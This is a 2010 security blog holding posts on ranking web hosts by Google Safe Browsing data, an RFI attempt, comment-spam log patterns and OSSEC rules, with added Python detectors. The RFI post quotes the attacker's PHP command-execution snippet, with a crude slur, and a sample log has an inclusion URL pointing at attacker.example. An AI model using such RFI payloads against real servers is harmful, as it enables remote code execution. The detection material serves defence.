security

Reviewing host companies – Which one is more secure?

Posted in bluehost, dreamhost, godaddy, netsol, review, security on September 2nd, 2010 by fseek

There are many hosting companies out there and many articles reviewing them. However, I have yet to see a review that treats security as its primary focus. What is the most secure (shared) hosting company out there? Which one should you use if you really care about security?

Note that for this article I am focusing on shared hosting, not dedicated or virtual servers.

Security is hard to measure, but there is a usable proxy for it: Google Safe Browsing. For each hosting company's network, Google reports how many of the sites it tested over the past 90 days were blacklisted (for hosting malware, viruses, phishing pages, etc.), and that ratio says a lot about the company.

Companies evaluated: Godaddy, Network Solutions, Bluehost, DreamHost, Rackspace and Media Temple.

The winner: Network Solutions. Netsol had some serious security issues in the past, but it looks like they have got things right. Only 1.38% of their sites were blacklisted in the last 90 days, and only 0.04% distributed malware.

The loser(s): Media Temple and Rackspace. They really shocked me. 21% of the sites hosted at Rackspace and 18% of the sites hosted at (mt) got hacked and blacklisted in the last 90 days. That is very bad news for their customers. It also means that somehow their infrastructure got hacked (even if they deny it). Hopefully they will get this fixed soon, but right now they are not recommended for anyone who cares about security.

Results:

#1- Network Solutions (most safe)
Blacklisted: 1.38%
Distributing malware: 0.04%

Of the 65257 site(s) we tested on this network over the past 90 days, 907 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

#2 – GoDaddy (close second place)
Blacklisted: 2.06%
Distributing malware: 0.16%

Of the 591259 site(s) we tested on this network over the past 90 days, 12204 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

#3 – DreamHost (technical tie for third)
Blacklisted: 3.26%
Distributing malware: 0.14%

#3 – Bluehost (technical tie for third)
Blacklisted: 3.18%
Distributing malware: 0.29%

#5 – Media Temple
Blacklisted: 18%
Distributing malware: 0.45%

Of the 64010 site(s) we tested on this network over the past 90 days, 11582 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

#6 – Rackspace (shame medal)
Blacklisted: 21%

Of the 13121 site(s) we tested on this network over the past 90 days, 2770 site(s) served content that resulted in malicious software being downloaded and installed without user consent.
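The ranking above can be reproduced from the diagnostic sentences themselves, which is also the easiest way to re-check it later. The following Python is an added example, not part of the original post: it parses the "Of the N site(s) we tested on this network..." sentence that Google prints, computes the blacklisted ratio and ranks the networks, flagging any whose tested population is small (Rackspace's 13121 sites is a much thinner sample than GoDaddy's 591259). The four sentences are the ones quoted above; DreamHost and Bluehost are left out because the post only gives their percentages. The MIN_SAMPLE threshold is an arbitrary choice for this example.

```python
import re
from typing import Dict, List, Tuple

# Shape of the Google Safe Browsing diagnostic sentence quoted in the post.
DIAG_RE = re.compile(
    r"Of the (?P<tested>\d+) site\(s\) we tested on this network over the past "
    r"90 days, (?P<bad>\d+) site\(s\) served content that resulted in malicious "
    r"software being downloaded"
)

# Below this many tested sites a percentage is a weak basis for a ranking
# (arbitrary threshold chosen for this example).
MIN_SAMPLE = 20000

# The four diagnostic sentences quoted in the post, keyed by company.
DIAGNOSTICS: Dict[str, str] = {
    "Network Solutions": "Of the 65257 site(s) we tested on this network over the past 90 days, 907 site(s) served content that resulted in malicious software being downloaded and installed without user consent.",
    "GoDaddy": "Of the 591259 site(s) we tested on this network over the past 90 days, 12204 site(s) served content that resulted in malicious software being downloaded and installed without user consent.",
    "Media Temple": "Of the 64010 site(s) we tested on this network over the past 90 days, 11582 site(s) served content that resulted in malicious software being downloaded and installed without user consent.",
    "Rackspace": "Of the 13121 site(s) we tested on this network over the past 90 days, 2770 site(s) served content that resulted in malicious software being downloaded and installed without user consent.",
}


def parse_diagnostic(text: str) -> Tuple[int, int]:
    """Return (sites tested, sites serving malware) from a diagnostic sentence."""
    m = DIAG_RE.search(text)
    if m is None:
        raise ValueError("not a Safe Browsing diagnostic sentence: %r" % text[:60])
    return int(m["tested"]), int(m["bad"])


def blacklist_rate(tested: int, bad: int) -> float:
    """Percentage of tested sites that were blacklisted."""
    if tested <= 0:
        raise ValueError("tested must be positive")
    return 100.0 * bad / tested


def rank_networks(diagnostics: Dict[str, str]) -> List[Tuple[str, int, int, float, bool]]:
    """Rank networks from safest to worst.

    Each entry is (name, tested, bad, rate_percent, small_sample).
    """
    rows = []
    for name, text in diagnostics.items():
        tested, bad = parse_diagnostic(text)
        rows.append((name, tested, bad, blacklist_rate(tested, bad), tested < MIN_SAMPLE))
    return sorted(rows, key=lambda r: r[3])


if __name__ == "__main__":
    for pos, (name, tested, bad, rate, small) in enumerate(rank_networks(DIAGNOSTICS), 1):
        flag = "  (small sample)" if small else ""
        print(f"#{pos} {name}: {bad}/{tested} blacklisted = {rate:.2f}%{flag}")
```

The computed ratios come out a hair different from the rounded figures in the post (907/65257 is 1.39%, not 1.38%), which is a reminder that the ranking, not the second decimal, is the useful output.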

That's it. Any comments or suggestions, let us know. If you want us to add another hosting company, just mention them in the comments and we will see how they are doing in terms of security.

0sirys was here and also is a fucking gay

Posted in funny, security on April 20th, 2010 by fseek

Someone was trying an RFI (remote file inclusion) attack against my server today.

They were trying to inject the following file: http://[site].com/modules/id.txt into my site. I went to check it out, and it looks like the file had been hacked a few times.

At the top of it, someone had added:

echo "Osirys";
$un = @ php_uname();
$id1 = system('id');

A bit further down, some funny haxor humor:

echo "0sirys was here and also is a fucking gay..";
echo "uname -a: $un";

I laughed. You can read more about these RFI attacks here.

What blog spam looks like in your logs

Posted in security, spam on April 19th, 2010 by fseek

Have you ever wondered what the difference is between a spammer and a real user? Well, your logs can show you.

I have not enabled any anti-spam plugin on this blog, and because of that I am being hammered with comment spam! Just out of curiosity I went to see what a spammer looks like in my logs.

The first one that looked legit came from 222.124.x.x, with a link to a YouTube video on how to make money online. This is how it looks in the logs:

222.124.x.x - - "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/ HTTP/1.0" 200 18293 "http://www.youtube.com/watch?v=Q2kmL3eYxgQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50"
222.124.x.x - - "POST /wp-comments-post.php HTTP/1.0" 302 - "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50"

And this is what a valid user looks like (when posting a comment):

174.16.a.b - - "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/ HTTP/1.1" 200 18293 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /wp-content/themes/simplex/style.css HTTP/1.1" 200 18055 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /wp-content/themes/simplex/includes/js/suckerfish.js HTTP/1.1" 200 400 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /wp-content/themes/simplex/css/default.css HTTP/1.1" 200 4276 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
... more logs..
174.16.a.b - - "GET /wp-content/themes/simplex/images/rss.gif HTTP/1.1" 200 621 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "POST /wp-comments-post.php HTTP/1.1" 302 - "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"
174.16.a.b - - "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/comment-page-1/ HTTP/1.1" 200 19647 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Shiira Safari/125"

Do you see the difference? First, the real visitor downloads the CSS, scripts and images that make up the template. Second, he has a valid referrer. Third, after posting the comment he follows the 302 back to the post he was commenting on (the GET of comment-page-1/ at the end).

The spammer only downloads the post itself (no template, images or scripts), posts the comment (the POST to /wp-comments-post.php) and leaves. It does not even follow the redirect back to the page. Its referrer is also the site it is spamming for.

I checked a few other spam comments and they all look the same:

91.214.44.x - - [18/Apr/2010:19:40:24 +0000] "POST /wp-comments-post.php HTTP/1.0" 302 - "http://fseek.me/2010/03/how-to-convince-any-c-developer-to-dump-gcc-and-use-clang/" "Opera/7.11 (Windows NT 5.1; U) [en]"
91.214.44.x - - [18/Apr/2010:19:40:24 +0000] "GET /2010/03/how-to-convince-any-c-developer-to-dump-gcc-and-use-clang/comment-page-1/ HTTP/1.0" 200 41741 "http://fseek.me/2010/03/how-to-convince-any-c-developer-to-dump-gcc-and-use-clang/comment-page-1/#comment-513" "Opera/7.11 (Windows NT 5.1; U) [en]"
123.238.42.a - - [17/Apr/2010:19:04:41 +0000] "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/comment-page-1/ HTTP/1.1" 200 22491 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.238.42.b - - [17/Apr/2010:19:04:46 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 - "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/comment-page-1/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Always the same pattern: at most one page fetch, the POST, and at most the redirect target, with none of the stylesheets, scripts or images a real browser loads.
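Both this post and the RFI one above describe things you can pick out of an Apache access log mechanically: a query-string parameter carrying a remote URL (the RFI probe that tried to pull modules/id.txt into the site), and a comment POST from a client that never fetched the template. The following Python is an added example, not part of the original posts: it parses Apache combined-format lines, flags requests whose query parameters hold a remote URL, and, for every POST to wp-comments-post.php, records the three tells described above. The log lines are constructed for the example and modelled on the ones in the post; attacker.example is a placeholder host, and the 198.51.100.7 and 222.124.0.1 / 174.16.1.2 addresses are documentation-style stand-ins.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

BLOG_HOST = "fseek.me"                      # the blog's own host, as seen in the referers
COMMENT_ENDPOINT = "/wp-comments-post.php"  # WordPress comment handler
ASSET_PREFIXES = ("/wp-content/", "/wp-includes/")    # theme css/js/images a browser fetches
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Apache "combined" log format. The timestamp is optional because some lines
# in the post have it stripped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ (?:\[(?P<time>[^\]]*)\] )?'
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one comment spammer, one real visitor, one RFI probe.
SAMPLE_LOG = """\
222.124.0.1 - - [19/Apr/2010:10:00:00 +0000] "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/ HTTP/1.0" 200 18293 "http://www.youtube.com/watch?v=Q2kmL3eYxgQ" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50"
222.124.0.1 - - [19/Apr/2010:10:00:01 +0000] "POST /wp-comments-post.php HTTP/1.0" 302 - "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50"
174.16.1.2 - - [19/Apr/2010:10:05:00 +0000] "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/ HTTP/1.1" 200 18293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/531.22.7"
174.16.1.2 - - [19/Apr/2010:10:05:00 +0000] "GET /wp-content/themes/simplex/style.css HTTP/1.1" 200 18055 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/531.22.7"
174.16.1.2 - - [19/Apr/2010:10:05:01 +0000] "GET /wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/531.22.7"
174.16.1.2 - - [19/Apr/2010:10:06:30 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 - "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/531.22.7"
174.16.1.2 - - [19/Apr/2010:10:06:31 +0000] "GET /2010/03/thats-why-i-will-not-invest-any-money-in-you/comment-page-1/ HTTP/1.1" 200 19647 "http://fseek.me/2010/03/thats-why-i-will-not-invest-any-money-in-you/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/531.22.7"
198.51.100.7 - - [20/Apr/2010:03:12:44 +0000] "GET /index.php?page=http://attacker.example/modules/id.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.834"
"""


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; None if it does not fit the format."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def rfi_params(path: str) -> List[str]:
    """Names of query parameters whose (URL-decoded) value is a remote URL,
    the hallmark of a remote-file-inclusion attempt such as ?page=http://evil/x.txt."""
    query = urlsplit(path).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]


def find_rfi_attempts(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """(client ip, request path, offending parameters) for every RFI-looking request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            params = rfi_params(rec["path"])
            if params:
                hits.append((rec["ip"], rec["path"], params))
    return hits


def classify_comments(lines: List[str]) -> Dict[str, List[str]]:
    """For each client that POSTed a comment, list the behavioural tells from the
    post; an empty list means the client behaved like a browser."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec["ip"]].append(rec)

    verdicts: Dict[str, List[str]] = {}
    for ip, recs in by_ip.items():
        for i, rec in enumerate(recs):
            if rec["method"] != "POST" or rec["path"] != COMMENT_ENDPOINT:
                continue
            before, after = recs[:i], recs[i + 1:]
            tells: List[str] = []
            # 1. a browser fetches the theme's css/js/images before it can post
            if not any(r["path"].startswith(ASSET_PREFIXES) for r in before):
                tells.append("no theme css/js/images fetched before posting")
            # 2. the spammer arrives from the site it is advertising
            off_site = [r["referer"] for r in before
                        if r["referer"] not in ("", "-")
                        and (urlsplit(r["referer"]).hostname or "") != BLOG_HOST]
            if off_site:
                tells.append("arrived with an off-site referer: " + off_site[0])
            # 3. a browser follows the 302 back to the post; a bot usually does not
            if rec["status"] == 302 and not any(r["method"] == "GET" for r in after):
                tells.append("did not follow the 302 back to the post")
            verdicts[ip] = tells
    return verdicts


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, path, params in find_rfi_attempts(lines):
        print("RFI attempt from", ip, "via", params, path)
    for ip, tells in classify_comments(lines).items():
        print(ip, "SPAM" if tells else "looks like a browser", tells)
```

The tells are scored per client IP in log order, so the log must be fed in chronological order. Note that the RFI check decodes percent-encoding before looking for a scheme, since an attacker can write %68ttp:// to slip past a naive substring match.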

OSSEC rule to ignore the msn/bing bot

Posted in ossec, security on March 8th, 2010 by fseek

You know, the MSN (Bing/Live) crawler is a strange bot. It keeps trying to access nonexistent files on my server, generating a bunch of 404s.

OSSEC, being smart as it is, goes ahead and blocks them via its "Web-based file scanning" alert. OSSEC is doing its part, but I don't want to block MSN/Bing (even though it likes to crawl invalid pages).

The solution? These two simple rules:

<rule id="100308" level="0">
  <if_sid>31101</if_sid>
  <id>404</id>
  <description>Ignoring msn bot.</description>
  <srcip>65.55.0.0/16</srcip>
  <match> "msnbot</match>
</rule>

<rule id="100310" level="0">
  <if_sid>31101</if_sid>
  <id>404</id>
  <description>Ignoring msn bot.</description>
  <srcip>207.46.0.0/16</srcip>
  <match> "msnbot</match>
</rule>

No more alerts for it…
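The two rules accept a 404 as crawler noise when the source IP is in one of two Microsoft ranges and the log line contains "msnbot". The IP range is the real guard here; the user-agent string is free text that anyone can send, and the ranges themselves can change. Microsoft's published way to verify its crawler is a reverse DNS lookup on the IP that yields a host under search.msn.com, confirmed by a forward lookup of that host back to the same IP. The following Python is an added example, not from the post or from OSSEC: it encodes the condition the two rules express and adds that forward-confirmed reverse DNS check. The resolvers are injectable so the example runs offline against a constructed DNS table; for real use pass the socket-based resolvers defined alongside it. The sample IPs and hostnames are made up for the example.

```python
import ipaddress
import socket
from typing import Callable, Dict, List

# What the two OSSEC rules above key on.
MSNBOT_RANGES = [ipaddress.ip_network("65.55.0.0/16"), ipaddress.ip_network("207.46.0.0/16")]
MSNBOT_UA = "msnbot"
# Hostname suffix Microsoft publishes for its crawlers; basis of the stronger check.
MSNBOT_DOMAIN = "search.msn.com"


def matches_ignore_rule(srcip: str, status: int, user_agent: str) -> bool:
    """The condition the two rules express: a 404 from one of the listed ranges
    whose user-agent contains 'msnbot' is dropped (level 0)."""
    ip = ipaddress.ip_address(srcip)
    return (status == 404
            and MSNBOT_UA in user_agent
            and any(ip in net for net in MSNBOT_RANGES))


def is_verified_msnbot(srcip: str,
                       reverse_lookup: Callable[[str], str],
                       forward_lookup: Callable[[str], List[str]]) -> bool:
    """Forward-confirmed reverse DNS: the IP must reverse-resolve to a host under
    search.msn.com, and that host must resolve back to the same IP. A client can
    spoof its user-agent, but it cannot forge both DNS directions."""
    try:
        host = reverse_lookup(srcip)
    except OSError:
        return False
    # endswith on ".search.msn.com" rejects lookalikes such as search.msn.com.evil.example
    if not host.lower().endswith("." + MSNBOT_DOMAIN):
        return False
    try:
        return srcip in forward_lookup(host)
    except OSError:
        return False


def should_ignore(srcip: str, status: int, user_agent: str,
                  reverse_lookup: Callable[[str], str],
                  forward_lookup: Callable[[str], List[str]]) -> bool:
    """Drop the 404 only if the cheap rule matches AND the crawler is genuine."""
    return (matches_ignore_rule(srcip, status, user_agent)
            and is_verified_msnbot(srcip, reverse_lookup, forward_lookup))


# Live resolvers for real use (network access required).
def live_reverse(ip: str) -> str:
    return socket.gethostbyaddr(ip)[0]


def live_forward(host: str) -> List[str]:
    return socket.gethostbyname_ex(host)[2]


# Constructed DNS table so the example runs offline: one genuine crawler and one
# client whose PTR record claims to be Microsoft but does not resolve back.
FAKE_PTR: Dict[str, str] = {
    "65.55.1.2": "msnbot-65-55-1-2.search.msn.com",
    "65.55.9.9": "msnbot-65-55-9-9.search.msn.com",
}
FAKE_A: Dict[str, List[str]] = {
    "msnbot-65-55-1-2.search.msn.com": ["65.55.1.2"],
    "msnbot-65-55-9-9.search.msn.com": ["203.0.113.77"],
}


def fake_reverse(ip: str) -> str:
    try:
        return FAKE_PTR[ip]
    except KeyError:
        raise OSError("no PTR record")


def fake_forward(host: str) -> List[str]:
    try:
        return FAKE_A[host]
    except KeyError:
        raise OSError("no A record")


if __name__ == "__main__":
    ua = "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"   # constructed sample UA
    for ip in ("65.55.1.2", "65.55.9.9", "65.55.0.1", "203.0.113.5"):
        print(ip, "rule:", matches_ignore_rule(ip, 404, ua),
              "verified:", is_verified_msnbot(ip, fake_reverse, fake_forward),
              "ignore:", should_ignore(ip, 404, ua, fake_reverse, fake_forward))
```

The DNS check costs two lookups per source IP, so in practice it is done once per IP and cached, not on every 404; the cheap rule stays as the first filter.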